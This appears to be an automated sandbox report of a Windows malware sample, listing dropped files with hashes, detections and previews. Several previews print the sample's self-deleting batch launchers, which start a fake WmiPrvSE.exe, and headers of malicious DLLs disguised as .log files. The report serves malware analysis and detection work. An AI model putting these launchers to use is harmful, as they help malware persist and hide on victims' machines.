SHA-512:	3B35E47F42916F3D3E7F40ACF57E3DACDFFD83D79091BA57126FE99099A18EC99444AE9393720E0BFB69199B31D52A81E88E403DB60EA90EB229D8324FF10298
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\KvMN3vAFGm.bat"

C:\Users\user\AppData\Local\Temp\LT16qBpyUU

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.023465189601646
Encrypted:	false
SSDEEP:	3:fcfPXQPAESB3F:En1V
MD5:	67F1C911A9A50E88F09B04552180F13F
SHA1:	3A570F4E5431071CF9856A4710E6A4BA4BBC1F8E
SHA-256:	A16143701F44067C7D951AD128BE5EED6F5EED44E6D98C46293DBFBFB8007EC5
SHA-512:	73DDAF9D326EC636518F0C2AFBFC1527D3FF68F30EA04E1CED9E7E19E3FAEA46A89FA45969899E10E51FDD1A069DEAC8870E7B574B448C799844D058728E6533
Malicious:	false
Preview:	z8pwJzjruHt17DsDw7dOqzrwS

C:\Users\user\AppData\Local\Temp\bieogrRRF6

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.293660689688185
Encrypted:	false
SSDEEP:	3:GDKhd7ffc:S0E
MD5:	1645ACE8EFC33847CF27E709E8586AA3
SHA1:	CB443E75DD06585121A631C36EF1B04DF045E031
SHA-256:	27AF0FF7E0A0E65E6A79B0FC446FE763A70FE9F1A4DB81256BE2C1003E78FFD0
SHA-512:	32ECBD2426A23B20CBD0DAFFAFAEAD9CDD5C5FBBDD308DC1EE45DEF2F9DD313F3E52F93C7A4C984216C00EC7F364829BE0093A3172176094F9443B6220A9F63D
Malicious:	false
Preview:	Xlr3SQLHJ7D83fEp1kzz83BIu

C:\Users\user\AppData\Local\Temp\c209pDRrD0

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.243856189774724
Encrypted:	false
SSDEEP:	3:kgkuuUGq:kgtGq
MD5:	F3B110E8F3316EF71595F25259EB71A4
SHA1:	0BE442B43E9553E8E0979B98EFAE5095399FC5BF
SHA-256:	B4894003F413BDDCFE3156DE472138222E96A0C6BAEE499766C4C7BE261AB93D
SHA-512:	6341D46AB150E2030321D299DB03F62AE39784E60830BD2E048644C214FB29BF7B72C229C3E6F550BFE5072F8A4441B3BE661889D958035D11524DE9D3FC1F1B
Malicious:	false
Preview:	nZucDbA3LEhaxRdEovAqcnN7d

C:\Users\user\AppData\Local\Temp\g6UJbp2Exv.bat

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	221
Entropy (8bit):	5.184410631488401
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEdHXi0KOZG1wkn23fD:HTg9uYDENX1fb
MD5:	6E568B351C7147EA4EDA2B0963239FD3
SHA1:	F07A276087517E85BA6B73B5DB45A0A8C3216692
SHA-256:	55516997D7A48E0D3A23304A30717AF1149A390E006B9BC50F9187887282EF1F
SHA-512:	D062567CE4B4A8EA00B3BEEBABC926A278EBFAA6D349B78F111A7A0A2F17C21B5067A6E82BB745EB4803EDAEFA54FA50FD76E9131850022006A216C02FB5D2BE
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\g6UJbp2Exv.bat"

C:\Users\user\AppData\Local\Temp\gA6Kj9AC8z.bat

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	221
Entropy (8bit):	5.219589081763592
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEdHXi0KOZG1wkn23fZTG:HTg9uYDENX1fRS
MD5:	2E1848194754817431E75FB27FE6C0FA
SHA1:	5600A6A33899B95F8D40F066E2C5A425C9C18FF1
SHA-256:	6774C889231A8D6A12A209AE98916BD5BDC3316AAFA5527E0B7170AA465BF5A5
SHA-512:	58BC66EF61E1E0549CE96EEEB096C106EBBBDD8DB88C5CB658D95819C1661517CA287710A81E1B7206C145B19849C4ED24AFD6E6D62805F80A17A86404C0A6F1
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\gA6Kj9AC8z.bat"

C:\Users\user\AppData\Local\Temp\grDS520PRI.bat

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	221
Entropy (8bit):	5.181238053673227
Encrypted:	false
SSDEEP:	6:hCijTg3Nou1SV+DEdHXi0KOZG1wkn23f89qq:HTg9uYDENX1fk9
MD5:	29A97ABA0EB2B5014279D6C9E9F8302B
SHA1:	D6485661FDB960B1715A7FDFC6FFCE19ED5F0048
SHA-256:	D863B7FC0656E19751E8BD551C0A0812AFF3BD0932F02EDF8A298158F2C0E9FF
SHA-512:	B382268FEA8D9BA56EF57D2D99D9B35DDCA050BEA59FE45C213A6D4A1A0A3A9C9CAFEDC0E8CB0662109AAF26733C6B6B7D96A7267DE47D7174CC9CA19E2F0018
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 > nul..start "" "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\grDS520PRI.bat"

C:\Users\user\AppData\Local\Temp\hBObAi4A4j

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.103465189601645
Encrypted:	false
SSDEEP:	3:MCUiA49V9Wrdn:MCUM0dn
MD5:	881B5BC6FE5AA0DD77BD5C917A49851F
SHA1:	02A875A44767A164E6AD0C99E6DD117392B9FA32
SHA-256:	05DA2DADFEE0F824CCA70D050C0AF80D4DBFC49AA84ECC52772C671AAD154A7F
SHA-512:	8ED1F4B2F9CF90713396FDED9466B685D3B25CC2E2C08386A7125A5374C691E508982295F023ECB4EBA98DE45660A1FE86F235EB4E81E02AAA309CEC790E1E28
Malicious:	false
Preview:	10g1G25Szh31z0IeNsjvXiu20

C:\Users\user\AppData\Local\Temp\oh1XY3CFsG

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.323856189774724
Encrypted:	false
SSDEEP:	3:6/sAjaxUyj/:6/UP
MD5:	109DC0672C92A11002F5F6CA6B20491F
SHA1:	5126059B42D9FE65CE0E8640F505FD0035CA9020
SHA-256:	17157FC3888C8F11A70AA41EB8CCD19B1B939ACFA17552B4511D9C1EFECCD306
SHA-512:	322DF4724F728E425F968D2EEB36E2920FB7938E1155E923F16C9BF96E03616E55D2DFED34D1A82749BA11A0A44EC46EBD37A95A1D4C672A39CEE17C52AE1AB2
Malicious:	false
Preview:	xLpB9D4JgqIW6FheLEQ1WFwxU

C:\Users\user\AppData\Local\Temp\rN7wUyQB6L

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.403856189774723
Encrypted:	false
SSDEEP:	3:4QpKMOIEv92:Dcvk
MD5:	52B007B6EBE8107859AD2EFBB608D017
SHA1:	8DAE232DDA2A0F07CEEE2C6C5DF583390D700090
SHA-256:	1B9993CCCDED14497E93A6ED2529FF67AA1C296110FB6E00F58DB2925D85898C
SHA-512:	27111C64690421C63180F0D865C2D3FCA507B2DE6311BE994A0DDB9E1D61DF069003D2EBD3A0635DD45408C386D7C3161673EB81B4A3F7D622B0FE6C5A7895AA
Malicious:	false
Preview:	mIejD3PAFwoi7Xbpga79b8LDk

C:\Users\user\AppData\Local\Temp\vDeTwOLJho

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.563856189774723
Encrypted:	false
SSDEEP:	3:WckCTAubd:Wcn5
MD5:	99A962571AD099EA8AD9AFDC41F1E1E7
SHA1:	DFD1ECF484B6D368344FF111A382EEA0C9BAF283
SHA-256:	6B157E1D0F3D8225B09D723E10EFC8FA5E878386D3C6A0287466FABF4F7CB7ED
SHA-512:	DF5F2BBD4F8EA70A14C5149E18AD898CDA5D89FB8D1631FC756D001E679F6B5B554880913F50CE902BF13F204DDAFEDB73F0093A46D023065519BC2F825285C8
Malicious:	false
Preview:	ufyL2P3BNzX1CU6eJZ78Wmysx

C:\Users\user\AppData\Local\Temp\x3fbj0yJ9Y.bat

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	5.2721643163974905
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mVPAnEXwXl8buIdASBktKcKZG1t+kiE2J5xAIePIM:hCRLuVFOOr+DEdHXi0KOZG1wkn23fQIM
MD5:	637791DBBC3804A7D9950C78EEE5C94A
SHA1:	F51A4566C41DE5B225949939D630D40C7D242BE1
SHA-256:	07FC4FC844AB5681DB805D377FBB4F50C95742E533254BDA013E0B804D9106CD
SHA-512:	849A9CBD1C7A003FEABC113274F5AEE6A150FC6E02A031C3DE8DB63B497977BE20022E278D29D4DA798B083FF08D384810AAFB33D74CDF80114919A4EED41F34
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\x3fbj0yJ9Y.bat"

C:\Users\user\AppData\Local\Temp\x8N8qyiaI1

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.103465189601645
Encrypted:	false
SSDEEP:	3:D40ErbSn:DCrbS
MD5:	EC911C560E5C93C4EA91B3B429E5F9CA
SHA1:	096B6FFDA13E5D73D17990C704851CB32110B1F7
SHA-256:	7603A877072F8389959656E1DD202DEAA4EBFF0F49C3BA575AA695B63751843B
SHA-512:	71B1D091CD7943A16CE70367C43F05FC54248A9284E5F2DAD1D08D5B0BFE9113E92A6DC78FC986B9A323B669CC30BB6CCA9D1B1E4D56A36350BC3AB7615B8052
Malicious:	false
Preview:	KKpnXTUHchAw6soLUwSKHwqg7

C:\Users\user\AppData\Local\Temp\yRPxJCkWkW.bat

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	173
Entropy (8bit):	5.249769501478837
Encrypted:	false
SSDEEP:	3:mKDDVNGvTVLuVFcROr+jn9mVPAnEXwXl8buIdASBktKcKZG1t+kiE2J5xAIAdv5v:hCRLuVFOOr+DEdHXi0KOZG1wkn23f4CG
MD5:	450BDAA9B4995284D4387F7EA0DB4F93
SHA1:	AB438A44576F9C67FE105DB0DE7364C14BD99AB7
SHA-256:	CB72B4A2C0ACBE235613D814989A3704F13AEBDFDF8BB580D6081E88DEA9723B
SHA-512:	880E8305318940AC6E2BB6F7BBFE4EEC0700C02F4ECB775F7D77539747D665A19EC5C6D8C1C71595285F95330824555374F513092067A73590597C9954E70BFD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100%
Preview:	@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\yRPxJCkWkW.bat"

C:\Users\user\Desktop\74ca659111f950

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	ASCII text, with very long lines (933), with no line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	5.902234185447404
Encrypted:	false
SSDEEP:	24:1mGyDlEqry5RWBXymeKAL74reYdR6kaN0OmTXIYj1Wvx:1mGyDlzroADD27a6kaeTlp8x
MD5:	1CD6E61CD74C9203FEF36ABBCD252070
SHA1:	D20FF8785488476C2096E879BAB18D90DD58EC46
SHA-256:	F1BF4C9517845101F8BDC9849DD3C2C11FD846ADEA99A799036D389FF1C89962
SHA-512:	CFD1BF95B32DD33C4C2B5A9292DDB87AC19DFA9D36B417DCE4E964036FA5C5473ADBFF4839C6B30A850BA08C7C0A9D920960FB90DF18F6093B51B1A2976C82F7
Malicious:	false
Preview:	ZfjilrMJ9JGwDcSB30wxm3SsrcSUENq2pwDJG58brWjr2xH5q7eDQWTfN11JZ2EvcNHRZJ582VGPTl03UWnGtnmSdh5ODyBzSyOoq0ghBgL5PDMmB8zCO7Czlyy2Nr4DTR7fWLNd0GENcrCZVTNF98kUwZC1CnUUmHl7FqPzvVMI2yW4vYh4dyDUrmt7IVbMwtlUFEUoDYUowcb7CIFoGZ1xDQQc7SqZ39WINCyrE20EeZiPKw5APwGW2xQzy1rus4uxFTt9TYkOjxTosBSLXpKH3AQZv93MKGWjpvJ1C5r0M1wFemHwjgXCun4FCTOTfXDdbt972aIb8T4BNL5I2GnosTyB0DztqXVyxTounJ4IY5Ebs220YFbZtZuH57GykYul8GN3hKesMfQwOXT8L8Vk55FYjgzqDFh9Kccmo8TNksMOJ72hnHnmDKpCAzUBVypH7Qmw4rTMpHANt0OlnRC5c55AxZlyoR1wDFR2VGm6xa75KcTKlsXEwtoBVl9eFfhXPNJniVPgoGHB890UGaN64xAUaQhuHI0S2kq6SplPc1ZqlmDVuoYpRldbNzMSyfZgPzJYT4Cbz7dCYUtyML9dtLBRGOsdcSb7b3avdpC0m60TIaD3GYFmf5wDy2RFLi9gggke37VhJI1xVrJqKzXDNybgGW7kX7pD7Txmzi9IDidXE8sGtk5VL5TrEEYg9uJMdx0B3h1lzOAoVEbHo11xCT1BAFhuKcJTYR3QIqNMtTf64oWAnQ2I2WKK6yAx9HaXFrQDKK97npEsx5GWtgG4kAaCHsUUqZMl2I1NYSzcR5eNRbXAroEcAgwEQN6bzpROcczoD38arnnpgNupVTmCUtlWVx6KVXmmnPuzls7ypnvW2HhDcRGgCP4t0dSQ6xETABBQd5DnWxWq8OdOP3rERGjYVA8IZq21j

C:\Users\user\Desktop\AEgOhmic.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Joe Sandbox View:	Filename: qZoQEFZUnv.exe, Detection: malicious, Browse Filename: w49A5FG3yg.exe, Detection: malicious, Browse Filename: 9XHFe6y4Dj.exe, Detection: malicious, Browse Filename: 12Vjq7Yv2E.exe, Detection: malicious, Browse Filename: 7WyBcig6e3.exe, Detection: malicious, Browse Filename: kBY9lgRaca.exe, Detection: malicious, Browse Filename: lv961v43L3.exe, Detection: malicious, Browse Filename: RRjzYVukzs.exe, Detection: malicious, Browse Filename: FMd6ntIhQY.exe, Detection: malicious, Browse Filename: 5Aw2cV5m0c.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\ANxQZOiH.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	342528
Entropy (8bit):	6.170134230759619
Encrypted:	false
SSDEEP:	3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
MD5:	9DADB5C8A6FD5020275C31EE6BC61D63
SHA1:	ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
SHA-256:	80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
SHA-512:	EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\AVufnTwx.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	33792
Entropy (8bit):	5.541771649974822
Encrypted:	false
SSDEEP:	768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
MD5:	2D6975FD1CC3774916D8FF75C449EE7B
SHA1:	0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
SHA-256:	75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
SHA-512:	6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....\|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...\|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\AddxSDXD.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	64000
Entropy (8bit):	5.857602289000348
Encrypted:	false
SSDEEP:	768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
MD5:	5EE7E079F998F80293B3467CE6A5B4AE
SHA1:	3C0932D48F3542E9DFB09AD9E1FF70891A038532
SHA-256:	A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
SHA-512:	056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........\|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BRrXbneT.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 17%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\BjyqpIYV.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\BwryKsoE.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 24%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\CDLiAAVt.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\CJLfMmRu.log

Download File

Process:	C:\Windows\GameBarPresenceWriter\WmiPrvSE.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	46592
Entropy (8bit):	5.870612048031897
Encrypted:	false
SSDEEP:	768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
MD5:	3601048DFB8C4A69313A593E74E5A2DE
SHA1:	A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
SHA-256:	F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
SHA-512:	B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...j..d...........!..................... ........@.. ....................... .......h....@.....................................S.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............K...........w.................................................................................................................................................................................$A.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\COJNZQhv.log

Download File

Process:	C:\Users\user\Desktop\9D7RwuJrth.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
